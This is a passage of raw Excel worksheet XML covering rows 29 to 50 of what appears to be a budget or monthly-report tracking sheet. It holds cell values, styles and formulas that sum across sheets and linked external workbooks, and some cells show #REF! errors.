      <c r="L29" s="194">
        <f>K29+yc!L29</f>
        <v>0</v>
      </c>
      <c r="M29" s="225"/>
      <c r="N29" s="320"/>
      <c r="O29" s="222"/>
      <c r="P29" s="223" t="s">
        <v>310</v>
      </c>
      <c r="Q29" s="224"/>
      <c r="R29" s="245"/>
      <c r="S29" s="240"/>
      <c r="T29" s="238"/>
      <c r="U29" s="238"/>
      <c r="V29" s="238"/>
      <c r="W29" s="238"/>
      <c r="X29" s="238"/>
      <c r="Y29" s="238"/>
      <c r="Z29" s="233"/>
    </row>
    <row r="30" ht="15.75" customHeight="1" spans="1:26">
      <c r="A30" s="191"/>
      <c r="B30" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C30" s="193"/>
      <c r="D30" s="193"/>
      <c r="E30" s="194"/>
      <c r="F30" s="194"/>
      <c r="G30" s="194"/>
      <c r="H30" s="194">
        <f>G30+'r'!H30</f>
        <v>0</v>
      </c>
      <c r="I30" s="194">
        <f>H30+yc!I30</f>
        <v>0</v>
      </c>
      <c r="J30" s="194"/>
      <c r="K30" s="194">
        <f>J30+'r'!K30</f>
        <v>0</v>
      </c>
      <c r="L30" s="194">
        <f>K30+yc!L30</f>
        <v>0</v>
      </c>
      <c r="M30" s="225"/>
      <c r="N30" s="320"/>
      <c r="O30" s="222"/>
      <c r="P30" s="223" t="s">
        <v>322</v>
      </c>
      <c r="Q30" s="224"/>
      <c r="R30" s="245"/>
      <c r="S30" s="238"/>
      <c r="T30" s="238"/>
      <c r="U30" s="238"/>
      <c r="V30" s="238"/>
      <c r="W30" s="238"/>
      <c r="X30" s="238"/>
      <c r="Y30" s="238"/>
      <c r="Z30" s="233"/>
    </row>
    <row r="31" ht="15.75" customHeight="1" spans="1:26">
      <c r="A31" s="191" t="s">
        <v>313</v>
      </c>
      <c r="B31" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C31" s="193"/>
      <c r="D31" s="193"/>
      <c r="E31" s="194">
        <v>118000</v>
      </c>
      <c r="F31" s="194"/>
      <c r="G31" s="194"/>
      <c r="H31" s="194">
        <f>G31+'r'!H31</f>
        <v>0</v>
      </c>
      <c r="I31" s="194">
        <f>H31+yc!I31</f>
        <v>1373007</v>
      </c>
      <c r="J31" s="194"/>
      <c r="K31" s="194">
        <f>J31+'r'!K31</f>
        <v>0</v>
      </c>
      <c r="L31" s="194">
        <f>K31+yc!L31</f>
        <v>1356048.13</v>
      </c>
      <c r="M31" s="225"/>
      <c r="N31" s="320">
        <f>M31/75000*100</f>
        <v>0</v>
      </c>
      <c r="O31" s="325"/>
      <c r="P31" s="223" t="s">
        <v>323</v>
      </c>
      <c r="Q31" s="224"/>
      <c r="R31" s="238"/>
      <c r="S31" s="238"/>
      <c r="T31" s="238"/>
      <c r="U31" s="238"/>
      <c r="V31" s="238"/>
      <c r="W31" s="238"/>
      <c r="X31" s="238"/>
      <c r="Y31" s="238"/>
      <c r="Z31" s="238"/>
    </row>
    <row r="32" ht="15.75" customHeight="1" spans="1:26">
      <c r="A32" s="191"/>
      <c r="B32" s="191" t="s">
        <v>244</v>
      </c>
      <c r="C32" s="193" t="s">
        <v>245</v>
      </c>
      <c r="D32" s="193" t="s">
        <v>246</v>
      </c>
      <c r="E32" s="194">
        <v>131000</v>
      </c>
      <c r="F32" s="194"/>
      <c r="G32" s="194"/>
      <c r="H32" s="194">
        <f>G32+'r'!H32</f>
        <v>0</v>
      </c>
      <c r="I32" s="194">
        <f>H32+yc!I32</f>
        <v>1527843</v>
      </c>
      <c r="J32" s="194"/>
      <c r="K32" s="194">
        <f>J32+'r'!K32</f>
        <v>0</v>
      </c>
      <c r="L32" s="194">
        <f>K32+yc!L32</f>
        <v>1021478</v>
      </c>
      <c r="M32" s="225"/>
      <c r="N32" s="320">
        <f>M32/65000*100</f>
        <v>0</v>
      </c>
      <c r="O32" s="196" t="s">
        <v>267</v>
      </c>
      <c r="P32" s="193" t="s">
        <v>211</v>
      </c>
      <c r="Q32" s="193"/>
      <c r="R32" s="193" t="s">
        <v>312</v>
      </c>
      <c r="S32" s="193" t="s">
        <v>313</v>
      </c>
      <c r="T32" s="193" t="s">
        <v>310</v>
      </c>
      <c r="U32" s="193" t="s">
        <v>314</v>
      </c>
      <c r="V32" s="193" t="s">
        <v>315</v>
      </c>
      <c r="W32" s="193" t="s">
        <v>319</v>
      </c>
      <c r="X32" s="193" t="s">
        <v>320</v>
      </c>
      <c r="Y32" s="193" t="s">
        <v>321</v>
      </c>
      <c r="Z32" s="238"/>
    </row>
    <row r="33" ht="15.75" customHeight="1" spans="1:26">
      <c r="A33" s="191"/>
      <c r="B33" s="193"/>
      <c r="C33" s="193"/>
      <c r="D33" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E33" s="194"/>
      <c r="F33" s="194"/>
      <c r="G33" s="194"/>
      <c r="H33" s="194">
        <f>G33+'r'!H33</f>
        <v>0</v>
      </c>
      <c r="I33" s="194">
        <f>H33+yc!I33</f>
        <v>0</v>
      </c>
      <c r="J33" s="194"/>
      <c r="K33" s="194">
        <f>J33+'r'!K33</f>
        <v>0</v>
      </c>
      <c r="L33" s="194">
        <f>K33+yc!L33</f>
        <v>0</v>
      </c>
      <c r="M33" s="225"/>
      <c r="N33" s="320"/>
      <c r="O33" s="199"/>
      <c r="P33" s="193" t="s">
        <v>324</v>
      </c>
      <c r="Q33" s="193" t="s">
        <v>325</v>
      </c>
      <c r="R33" s="326"/>
      <c r="S33" s="326"/>
      <c r="T33" s="326"/>
      <c r="U33" s="326"/>
      <c r="V33" s="326"/>
      <c r="W33" s="326"/>
      <c r="X33" s="326"/>
      <c r="Y33" s="326"/>
      <c r="Z33" s="326"/>
    </row>
    <row r="34" ht="15.75" customHeight="1" spans="1:26">
      <c r="A34" s="191"/>
      <c r="B34" s="193"/>
      <c r="C34" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D34" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E34" s="194"/>
      <c r="F34" s="194"/>
      <c r="G34" s="194"/>
      <c r="H34" s="194">
        <f>G34+'r'!H34</f>
        <v>0</v>
      </c>
      <c r="I34" s="194">
        <f>H34+yc!I34</f>
        <v>0</v>
      </c>
      <c r="J34" s="194"/>
      <c r="K34" s="194">
        <f>J34+'r'!K34</f>
        <v>0</v>
      </c>
      <c r="L34" s="194">
        <f>K34+yc!L34</f>
        <v>467202.93</v>
      </c>
      <c r="M34" s="225"/>
      <c r="N34" s="320"/>
      <c r="O34" s="199"/>
      <c r="P34" s="193" t="s">
        <v>326</v>
      </c>
      <c r="Q34" s="193" t="s">
        <v>325</v>
      </c>
      <c r="R34" s="326"/>
      <c r="S34" s="326"/>
      <c r="T34" s="326"/>
      <c r="U34" s="326"/>
      <c r="V34" s="326"/>
      <c r="W34" s="326"/>
      <c r="X34" s="326"/>
      <c r="Y34" s="326"/>
      <c r="Z34" s="326"/>
    </row>
    <row r="35" ht="15.75" customHeight="1" spans="1:26">
      <c r="A35" s="191"/>
      <c r="B35" s="193"/>
      <c r="C35" s="193"/>
      <c r="D35" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E35" s="194"/>
      <c r="F35" s="194"/>
      <c r="G35" s="194"/>
      <c r="H35" s="194">
        <f>G35+'r'!H35</f>
        <v>0</v>
      </c>
      <c r="I35" s="194">
        <f>H35+yc!I35</f>
        <v>0</v>
      </c>
      <c r="J35" s="194"/>
      <c r="K35" s="194">
        <f>J35+'r'!K35</f>
        <v>0</v>
      </c>
      <c r="L35" s="194">
        <f>K35+yc!L35</f>
        <v>0</v>
      </c>
      <c r="M35" s="225"/>
      <c r="N35" s="320"/>
      <c r="O35" s="199"/>
      <c r="P35" s="193" t="s">
        <v>327</v>
      </c>
      <c r="Q35" s="193" t="s">
        <v>325</v>
      </c>
      <c r="R35" s="326"/>
      <c r="S35" s="326"/>
      <c r="T35" s="326"/>
      <c r="U35" s="326"/>
      <c r="V35" s="326"/>
      <c r="W35" s="326"/>
      <c r="X35" s="326"/>
      <c r="Y35" s="326"/>
      <c r="Z35" s="326"/>
    </row>
    <row r="36" ht="15.75" customHeight="1" spans="1:26">
      <c r="A36" s="191"/>
      <c r="B36" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C36" s="193"/>
      <c r="D36" s="193"/>
      <c r="E36" s="194">
        <f>E37+E40</f>
        <v>118000</v>
      </c>
      <c r="F36" s="194"/>
      <c r="G36" s="194"/>
      <c r="H36" s="194">
        <f>G36+'r'!H36</f>
        <v>0</v>
      </c>
      <c r="I36" s="194">
        <f>H36+yc!I36</f>
        <v>0</v>
      </c>
      <c r="J36" s="194">
        <f>J37+J40</f>
        <v>0</v>
      </c>
      <c r="K36" s="194"/>
      <c r="L36" s="194">
        <f>K36+yc!L36</f>
        <v>0</v>
      </c>
      <c r="M36" s="225"/>
      <c r="N36" s="320"/>
      <c r="O36" s="327"/>
      <c r="P36" s="193" t="s">
        <v>328</v>
      </c>
      <c r="Q36" s="193" t="s">
        <v>325</v>
      </c>
      <c r="R36" s="326"/>
      <c r="S36" s="326"/>
      <c r="T36" s="326"/>
      <c r="U36" s="326"/>
      <c r="V36" s="326"/>
      <c r="W36" s="326"/>
      <c r="X36" s="326"/>
      <c r="Y36" s="326"/>
      <c r="Z36" s="326"/>
    </row>
    <row r="37" ht="15.75" customHeight="1" spans="1:26">
      <c r="A37" s="191"/>
      <c r="B37" s="193" t="s">
        <v>254</v>
      </c>
      <c r="C37" s="193"/>
      <c r="D37" s="193"/>
      <c r="E37" s="194">
        <f>SUM(E38:E39)</f>
        <v>118000</v>
      </c>
      <c r="F37" s="194"/>
      <c r="G37" s="194"/>
      <c r="H37" s="194">
        <f>G37+'r'!H37</f>
        <v>0</v>
      </c>
      <c r="I37" s="194">
        <f>H37+yc!I37</f>
        <v>0</v>
      </c>
      <c r="J37" s="194">
        <f>SUM(J38:J39)</f>
        <v>0</v>
      </c>
      <c r="K37" s="194">
        <f>J37+'r'!K37</f>
        <v>0</v>
      </c>
      <c r="L37" s="194">
        <f>K37+yc!L37</f>
        <v>0</v>
      </c>
      <c r="M37" s="225"/>
      <c r="N37" s="320"/>
      <c r="O37" s="208" t="s">
        <v>268</v>
      </c>
      <c r="P37" s="193" t="s">
        <v>329</v>
      </c>
      <c r="Q37" s="193" t="s">
        <v>325</v>
      </c>
      <c r="R37" s="238"/>
      <c r="S37" s="328"/>
      <c r="T37" s="238"/>
      <c r="U37" s="233"/>
      <c r="V37" s="233"/>
      <c r="W37" s="233"/>
      <c r="X37" s="238"/>
      <c r="Y37" s="233"/>
      <c r="Z37" s="328"/>
    </row>
    <row r="38" ht="15.75" customHeight="1" spans="1:26">
      <c r="A38" s="191"/>
      <c r="B38" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C38" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D38" s="193"/>
      <c r="E38" s="194">
        <v>76000</v>
      </c>
      <c r="F38" s="194"/>
      <c r="G38" s="225"/>
      <c r="H38" s="194">
        <f>G38+'r'!H38</f>
        <v>0</v>
      </c>
      <c r="I38" s="194">
        <f>H38+yc!I38</f>
        <v>0</v>
      </c>
      <c r="J38" s="194"/>
      <c r="K38" s="194">
        <f>J38+'r'!K38</f>
        <v>0</v>
      </c>
      <c r="L38" s="194">
        <f>K38+yc!L38</f>
        <v>0</v>
      </c>
      <c r="M38" s="194"/>
      <c r="N38" s="320"/>
      <c r="O38" s="208"/>
      <c r="P38" s="192" t="s">
        <v>269</v>
      </c>
      <c r="Q38" s="192"/>
      <c r="R38" s="193" t="s">
        <v>270</v>
      </c>
      <c r="S38" s="229" t="s">
        <v>213</v>
      </c>
      <c r="T38" s="193" t="s">
        <v>271</v>
      </c>
      <c r="U38" s="230" t="s">
        <v>272</v>
      </c>
      <c r="V38" s="230" t="s">
        <v>273</v>
      </c>
      <c r="W38" s="230" t="s">
        <v>274</v>
      </c>
      <c r="X38" s="193" t="s">
        <v>275</v>
      </c>
      <c r="Y38" s="230" t="s">
        <v>276</v>
      </c>
      <c r="Z38" s="229" t="s">
        <v>218</v>
      </c>
    </row>
    <row r="39" ht="15.75" customHeight="1" spans="1:26">
      <c r="A39" s="191"/>
      <c r="B39" s="191"/>
      <c r="C39" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D39" s="193"/>
      <c r="E39" s="194">
        <v>42000</v>
      </c>
      <c r="F39" s="194"/>
      <c r="G39" s="194"/>
      <c r="H39" s="194">
        <f>G39+'r'!H39</f>
        <v>0</v>
      </c>
      <c r="I39" s="194">
        <f>H39+yc!I39</f>
        <v>0</v>
      </c>
      <c r="J39" s="194"/>
      <c r="K39" s="194">
        <f>J39+'r'!K39</f>
        <v>0</v>
      </c>
      <c r="L39" s="194">
        <f>K39+yc!L39</f>
        <v>0</v>
      </c>
      <c r="M39" s="194"/>
      <c r="N39" s="320"/>
      <c r="O39" s="208"/>
      <c r="P39" s="218" t="s">
        <v>312</v>
      </c>
      <c r="Q39" s="191" t="s">
        <v>277</v>
      </c>
      <c r="R39" s="329">
        <v>22500</v>
      </c>
      <c r="S39" s="232">
        <f>[1]月报!$S$17</f>
        <v>9938.78</v>
      </c>
      <c r="T39" s="233">
        <f>[1]月报!$T$17</f>
        <v>0</v>
      </c>
      <c r="U39" s="234"/>
      <c r="V39" s="234">
        <f>U39+yc!V35</f>
        <v>0</v>
      </c>
      <c r="W39" s="235">
        <f>[1]月报!$W$17</f>
        <v>0</v>
      </c>
      <c r="X39" s="234"/>
      <c r="Y39" s="235">
        <f>X39+yc!Y35</f>
        <v>0</v>
      </c>
      <c r="Z39" s="235" t="e">
        <f>Y39+#REF!</f>
        <v>#REF!</v>
      </c>
    </row>
    <row r="40" ht="15.75" customHeight="1" spans="1:26">
      <c r="A40" s="191"/>
      <c r="B40" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C40" s="193"/>
      <c r="D40" s="193"/>
      <c r="E40" s="194"/>
      <c r="F40" s="194"/>
      <c r="G40" s="225"/>
      <c r="H40" s="194">
        <f>G40+'r'!H40</f>
        <v>0</v>
      </c>
      <c r="I40" s="194">
        <f>H40+yc!I40</f>
        <v>0</v>
      </c>
      <c r="J40" s="194"/>
      <c r="K40" s="194">
        <f>J40+'r'!K40</f>
        <v>0</v>
      </c>
      <c r="L40" s="194">
        <f>K40+yc!L40</f>
        <v>0</v>
      </c>
      <c r="M40" s="194"/>
      <c r="N40" s="320"/>
      <c r="O40" s="208"/>
      <c r="P40" s="236"/>
      <c r="V40" s="234" t="e">
        <f>U40+yc!V36</f>
        <v>#VALUE!</v>
      </c>
      <c r="Y40" s="235" t="e">
        <f>X40+yc!Y36</f>
        <v>#VALUE!</v>
      </c>
    </row>
    <row r="41" ht="15.75" customHeight="1" spans="1:26">
      <c r="A41" s="191" t="s">
        <v>310</v>
      </c>
      <c r="B41" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C41" s="193"/>
      <c r="D41" s="193"/>
      <c r="E41" s="194">
        <v>99000</v>
      </c>
      <c r="F41" s="194"/>
      <c r="G41" s="225"/>
      <c r="H41" s="194">
        <f>G41+'r'!H41</f>
        <v>0</v>
      </c>
      <c r="I41" s="194" t="e">
        <f>H41+yc!#REF!</f>
        <v>#REF!</v>
      </c>
      <c r="J41" s="194"/>
      <c r="K41" s="194">
        <f>J41+'r'!K41</f>
        <v>0</v>
      </c>
      <c r="L41" s="194" t="e">
        <f>K41+yc!#REF!</f>
        <v>#REF!</v>
      </c>
      <c r="M41" s="194"/>
      <c r="N41" s="320">
        <f>M41/48000*100</f>
        <v>0</v>
      </c>
      <c r="O41" s="208"/>
      <c r="P41" s="236"/>
      <c r="Q41" s="191" t="s">
        <v>279</v>
      </c>
      <c r="R41" s="329">
        <v>7600</v>
      </c>
      <c r="S41" s="232">
        <f>[1]月报!$S$19+[1]月报!$S$20+[1]月报!$S$21+[1]月报!$S$22</f>
        <v>7764.83</v>
      </c>
      <c r="T41" s="238">
        <f>[1]月报!$T$19+[1]月报!$T$20+[1]月报!$T$21+[1]月报!$T$22</f>
        <v>0</v>
      </c>
      <c r="U41" s="234"/>
      <c r="V41" s="234">
        <f>U41+yc!V37</f>
        <v>0</v>
      </c>
      <c r="W41" s="235">
        <f>[1]月报!$W$19+[1]月报!$W$20+[1]月报!$W$21+[1]月报!$W$22</f>
        <v>0</v>
      </c>
      <c r="X41" s="234"/>
      <c r="Y41" s="235">
        <f>X41+yc!Y37</f>
        <v>0</v>
      </c>
      <c r="Z41" s="238">
        <f>[1]月报!$Z$19+[1]月报!$Z$20+[1]月报!$Z$21+[1]月报!$Z$22</f>
        <v>8292.593</v>
      </c>
    </row>
    <row r="42" ht="15.75" customHeight="1" spans="1:26">
      <c r="A42" s="191"/>
      <c r="B42" s="191" t="s">
        <v>244</v>
      </c>
      <c r="C42" s="193" t="s">
        <v>245</v>
      </c>
      <c r="D42" s="193" t="s">
        <v>246</v>
      </c>
      <c r="E42" s="194">
        <v>80000</v>
      </c>
      <c r="F42" s="194"/>
      <c r="G42" s="225"/>
      <c r="H42" s="194">
        <f>G42+'r'!H42</f>
        <v>0</v>
      </c>
      <c r="I42" s="194" t="e">
        <f>H42+yc!#REF!</f>
        <v>#REF!</v>
      </c>
      <c r="J42" s="194"/>
      <c r="K42" s="194">
        <f>J42+'r'!K42</f>
        <v>0</v>
      </c>
      <c r="L42" s="194" t="e">
        <f>K42+yc!#REF!</f>
        <v>#REF!</v>
      </c>
      <c r="M42" s="194"/>
      <c r="N42" s="320">
        <f>M42/100000*100</f>
        <v>0</v>
      </c>
      <c r="O42" s="208"/>
      <c r="P42" s="236"/>
      <c r="Q42" s="191" t="s">
        <v>280</v>
      </c>
      <c r="R42" s="239"/>
      <c r="S42" s="240">
        <f>[1]月报!$S$12</f>
        <v>3696.51</v>
      </c>
      <c r="T42" s="238">
        <f>[1]月报!$T$12</f>
        <v>0</v>
      </c>
      <c r="U42" s="234"/>
      <c r="V42" s="234">
        <f>U42+yc!V38</f>
        <v>259139.72</v>
      </c>
      <c r="W42" s="235">
        <f>[1]月报!$W$12</f>
        <v>0</v>
      </c>
      <c r="X42" s="234"/>
      <c r="Y42" s="235">
        <f>X42+yc!Y38</f>
        <v>256107</v>
      </c>
      <c r="Z42" s="238">
        <f>[1]月报!$Z$12</f>
        <v>2953.055</v>
      </c>
    </row>
    <row r="43" ht="15.75" customHeight="1" spans="1:26">
      <c r="A43" s="191"/>
      <c r="B43" s="193"/>
      <c r="C43" s="193"/>
      <c r="D43" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E43" s="194"/>
      <c r="F43" s="194"/>
      <c r="G43" s="225"/>
      <c r="H43" s="194">
        <f>G43+'r'!H43</f>
        <v>0</v>
      </c>
      <c r="I43" s="194" t="e">
        <f>H43+yc!#REF!</f>
        <v>#REF!</v>
      </c>
      <c r="J43" s="194"/>
      <c r="K43" s="194">
        <f>J43+'r'!K43</f>
        <v>0</v>
      </c>
      <c r="L43" s="194" t="e">
        <f>K43+yc!#REF!</f>
        <v>#REF!</v>
      </c>
      <c r="M43" s="194"/>
      <c r="N43" s="320"/>
      <c r="O43" s="208"/>
      <c r="P43" s="215" t="s">
        <v>313</v>
      </c>
      <c r="Q43" s="191" t="s">
        <v>277</v>
      </c>
      <c r="R43" s="239">
        <v>22500</v>
      </c>
      <c r="S43" s="240">
        <f>[2]月报!$F$70</f>
        <v>8252</v>
      </c>
      <c r="T43" s="238">
        <f>[2]月报!$H$70</f>
        <v>0</v>
      </c>
      <c r="U43" s="234"/>
      <c r="V43" s="234">
        <f>U43+yc!V39</f>
        <v>78813.599</v>
      </c>
      <c r="W43" s="235">
        <f>[2]月报!$K$70</f>
        <v>0</v>
      </c>
      <c r="X43" s="234"/>
      <c r="Y43" s="235">
        <f>X43+yc!Y39</f>
        <v>78759</v>
      </c>
      <c r="Z43" s="238">
        <f>[2]月报!$N$70</f>
        <v>4300</v>
      </c>
    </row>
    <row r="44" ht="15.75" customHeight="1" spans="1:26">
      <c r="A44" s="191"/>
      <c r="B44" s="193"/>
      <c r="C44" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D44" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E44" s="194"/>
      <c r="F44" s="194"/>
      <c r="G44" s="225"/>
      <c r="H44" s="194">
        <f>G44+'r'!H44</f>
        <v>0</v>
      </c>
      <c r="I44" s="194" t="e">
        <f>H44+yc!#REF!</f>
        <v>#REF!</v>
      </c>
      <c r="J44" s="194"/>
      <c r="K44" s="194">
        <f>J44+'r'!K44</f>
        <v>0</v>
      </c>
      <c r="L44" s="194" t="e">
        <f>K44+yc!#REF!</f>
        <v>#REF!</v>
      </c>
      <c r="M44" s="194"/>
      <c r="N44" s="320"/>
      <c r="O44" s="208"/>
      <c r="P44" s="215"/>
      <c r="Q44" s="241"/>
      <c r="R44" s="241"/>
      <c r="S44" s="235"/>
      <c r="T44" s="235"/>
      <c r="U44" s="235"/>
      <c r="V44" s="235"/>
      <c r="W44" s="235"/>
      <c r="X44" s="235"/>
      <c r="Y44" s="235"/>
      <c r="Z44" s="235"/>
    </row>
    <row r="45" ht="15.75" customHeight="1" spans="1:26">
      <c r="A45" s="191"/>
      <c r="B45" s="193"/>
      <c r="C45" s="193"/>
      <c r="D45" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E45" s="194"/>
      <c r="F45" s="194"/>
      <c r="G45" s="225"/>
      <c r="H45" s="194">
        <f>G45+'r'!H45</f>
        <v>0</v>
      </c>
      <c r="I45" s="194" t="e">
        <f>H45+yc!#REF!</f>
        <v>#REF!</v>
      </c>
      <c r="J45" s="194"/>
      <c r="K45" s="194">
        <f>J45+'r'!K45</f>
        <v>0</v>
      </c>
      <c r="L45" s="194" t="e">
        <f>K45+yc!#REF!</f>
        <v>#REF!</v>
      </c>
      <c r="M45" s="194"/>
      <c r="N45" s="320"/>
      <c r="O45" s="208"/>
      <c r="P45" s="215"/>
      <c r="Q45" s="193" t="s">
        <v>281</v>
      </c>
      <c r="R45" s="241"/>
      <c r="S45" s="235"/>
      <c r="T45" s="235"/>
      <c r="U45" s="235"/>
      <c r="V45" s="234">
        <f>U45+yc!V41</f>
        <v>0.621000000000095</v>
      </c>
      <c r="W45" s="235"/>
      <c r="X45" s="235"/>
      <c r="Y45" s="235">
        <f>X45+yc!Y41</f>
        <v>9.45910016980633e-14</v>
      </c>
      <c r="Z45" s="235"/>
    </row>
    <row r="46" ht="15.75" customHeight="1" spans="1:26">
      <c r="A46" s="191"/>
      <c r="B46" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C46" s="193"/>
      <c r="D46" s="193"/>
      <c r="E46" s="194">
        <f>E47+E50</f>
        <v>99000</v>
      </c>
      <c r="F46" s="194"/>
      <c r="G46" s="225"/>
      <c r="H46" s="194">
        <f>G46+'r'!H46</f>
        <v>0</v>
      </c>
      <c r="I46" s="194" t="e">
        <f>H46+yc!#REF!</f>
        <v>#REF!</v>
      </c>
      <c r="J46" s="194">
        <f>J47+J50</f>
        <v>0</v>
      </c>
      <c r="K46" s="194">
        <f>J46+'r'!K46</f>
        <v>0</v>
      </c>
      <c r="L46" s="194" t="e">
        <f>K46+yc!#REF!</f>
        <v>#REF!</v>
      </c>
      <c r="M46" s="194"/>
      <c r="N46" s="320"/>
      <c r="O46" s="208"/>
      <c r="P46" s="215"/>
      <c r="Q46" s="191" t="s">
        <v>279</v>
      </c>
      <c r="R46" s="237">
        <v>8500</v>
      </c>
      <c r="S46" s="240">
        <f>[2]月报!$F$74+[2]月报!$F$75</f>
        <v>7312.99990873016</v>
      </c>
      <c r="T46" s="238">
        <f>[2]月报!$H$74+[2]月报!$H$75</f>
        <v>0</v>
      </c>
      <c r="U46" s="234"/>
      <c r="V46" s="234">
        <f>U46+yc!V42</f>
        <v>207586.97</v>
      </c>
      <c r="W46" s="235">
        <f>[2]月报!$K$74+[2]月报!$K$75</f>
        <v>0</v>
      </c>
      <c r="X46" s="234"/>
      <c r="Y46" s="235">
        <f>X46+yc!Y42</f>
        <v>202471</v>
      </c>
      <c r="Z46" s="238">
        <f>[2]月报!$N$74+[2]月报!$N$75</f>
        <v>4777.9962414966</v>
      </c>
    </row>
    <row r="47" ht="15.75" customHeight="1" spans="1:26">
      <c r="A47" s="191"/>
      <c r="B47" s="193" t="s">
        <v>254</v>
      </c>
      <c r="C47" s="193"/>
      <c r="D47" s="193"/>
      <c r="E47" s="194">
        <f>SUM(E48:E49)</f>
        <v>99000</v>
      </c>
      <c r="F47" s="194"/>
      <c r="G47" s="225"/>
      <c r="H47" s="194">
        <f>G47+'r'!H47</f>
        <v>0</v>
      </c>
      <c r="I47" s="194" t="e">
        <f>H47+yc!#REF!</f>
        <v>#REF!</v>
      </c>
      <c r="J47" s="194">
        <f>SUM(J48:J49)</f>
        <v>0</v>
      </c>
      <c r="K47" s="194">
        <f>J47+'r'!K47</f>
        <v>0</v>
      </c>
      <c r="L47" s="194" t="e">
        <f>K47+yc!#REF!</f>
        <v>#REF!</v>
      </c>
      <c r="M47" s="194"/>
      <c r="N47" s="320"/>
      <c r="O47" s="208"/>
      <c r="P47" s="215"/>
      <c r="Q47" s="191" t="s">
        <v>280</v>
      </c>
      <c r="R47" s="237"/>
      <c r="S47" s="240">
        <f>[2]月报!$F$72+[2]月报!$F$73</f>
        <v>1250</v>
      </c>
      <c r="T47" s="233">
        <f>[2]月报!$H$72+[2]月报!$H$73</f>
        <v>0</v>
      </c>
      <c r="U47" s="234"/>
      <c r="V47" s="234">
        <f>U47+yc!V43</f>
        <v>0</v>
      </c>
      <c r="W47" s="235">
        <f>[2]月报!$K$72+[2]月报!$K$73</f>
        <v>0</v>
      </c>
      <c r="X47" s="234"/>
      <c r="Y47" s="235">
        <f>X47+yc!Y43</f>
        <v>0</v>
      </c>
      <c r="Z47" s="238">
        <f>[2]月报!$N$72+[2]月报!$N$73</f>
        <v>1150</v>
      </c>
    </row>
    <row r="48" ht="15.75" customHeight="1" spans="1:26">
      <c r="A48" s="191"/>
      <c r="B48" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C48" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D48" s="193"/>
      <c r="E48" s="194">
        <v>50000</v>
      </c>
      <c r="F48" s="194"/>
      <c r="G48" s="225"/>
      <c r="H48" s="194">
        <f>G48+'r'!H48</f>
        <v>0</v>
      </c>
      <c r="I48" s="194" t="e">
        <f>H48+yc!#REF!</f>
        <v>#REF!</v>
      </c>
      <c r="J48" s="194"/>
      <c r="K48" s="194">
        <f>J48+'r'!K48</f>
        <v>0</v>
      </c>
      <c r="L48" s="194" t="e">
        <f>K48+yc!#REF!</f>
        <v>#REF!</v>
      </c>
      <c r="M48" s="194"/>
      <c r="N48" s="320"/>
      <c r="O48" s="208"/>
      <c r="P48" s="200" t="s">
        <v>310</v>
      </c>
      <c r="Q48" s="193" t="s">
        <v>278</v>
      </c>
      <c r="R48" s="237"/>
      <c r="S48" s="238" t="e">
        <f>[3]月报!$S$16</f>
        <v>#REF!</v>
      </c>
      <c r="T48" s="245" t="e">
        <f>[3]月报!$T$16</f>
        <v>#REF!</v>
      </c>
      <c r="U48" s="234"/>
      <c r="V48" s="234" t="e">
        <f>U48+yc!#REF!</f>
        <v>#REF!</v>
      </c>
      <c r="W48" s="235" t="e">
        <f>[3]月报!$W$16</f>
        <v>#REF!</v>
      </c>
      <c r="X48" s="234"/>
      <c r="Y48" s="235" t="e">
        <f>X48+yc!#REF!</f>
        <v>#REF!</v>
      </c>
      <c r="Z48" s="238" t="e">
        <f>[3]月报!$Z$16</f>
        <v>#REF!</v>
      </c>
    </row>
    <row r="49" ht="15.75" customHeight="1" spans="1:26">
      <c r="A49" s="191"/>
      <c r="B49" s="191"/>
      <c r="C49" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D49" s="193"/>
      <c r="E49" s="194">
        <v>49000</v>
      </c>
      <c r="F49" s="194"/>
      <c r="G49" s="194"/>
      <c r="H49" s="194">
        <f>G49+'r'!H49</f>
        <v>0</v>
      </c>
      <c r="I49" s="194" t="e">
        <f>H49+yc!#REF!</f>
        <v>#REF!</v>
      </c>
      <c r="J49" s="194"/>
      <c r="K49" s="194">
        <f>J49+'r'!K49</f>
        <v>0</v>
      </c>
      <c r="L49" s="194" t="e">
        <f>K49+yc!#REF!</f>
        <v>#REF!</v>
      </c>
      <c r="M49" s="194"/>
      <c r="N49" s="320"/>
      <c r="O49" s="208"/>
      <c r="P49" s="200"/>
      <c r="Q49" s="191" t="s">
        <v>277</v>
      </c>
      <c r="R49" s="237">
        <v>8000</v>
      </c>
      <c r="S49" s="238" t="e">
        <f>[3]月报!$S$17</f>
        <v>#REF!</v>
      </c>
      <c r="T49" s="245" t="e">
        <f>[3]月报!$T$17</f>
        <v>#REF!</v>
      </c>
      <c r="U49" s="234"/>
      <c r="V49" s="234" t="e">
        <f>U49+yc!#REF!</f>
        <v>#REF!</v>
      </c>
      <c r="W49" s="235" t="e">
        <f>[3]月报!$W$17</f>
        <v>#REF!</v>
      </c>
      <c r="X49" s="234"/>
      <c r="Y49" s="235" t="e">
        <f>X49+yc!#REF!</f>
        <v>#REF!</v>
      </c>
      <c r="Z49" s="238" t="e">
        <f>[3]月报!$Z$17</f>
        <v>#REF!</v>
      </c>
    </row>
    <row r="50" ht="15.75" customHeight="1" spans="1:26">
      <c r="A50" s="191"/>
      <c r="B50" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C50" s="193"/>
      <c r="D50" s="193"/>
      <c r="E50" s="194"/>
      <c r="F50" s="194"/>
      <c r="G50" s="225"/>
      <c r="H50" s="194">
        <f>G50+'r'!H50</f>
        <v>0</v>
      </c>
      <c r="I50" s="194" t="e">
        <f>H50+yc!#REF!</f>
        <v>#REF!</v>
      </c>
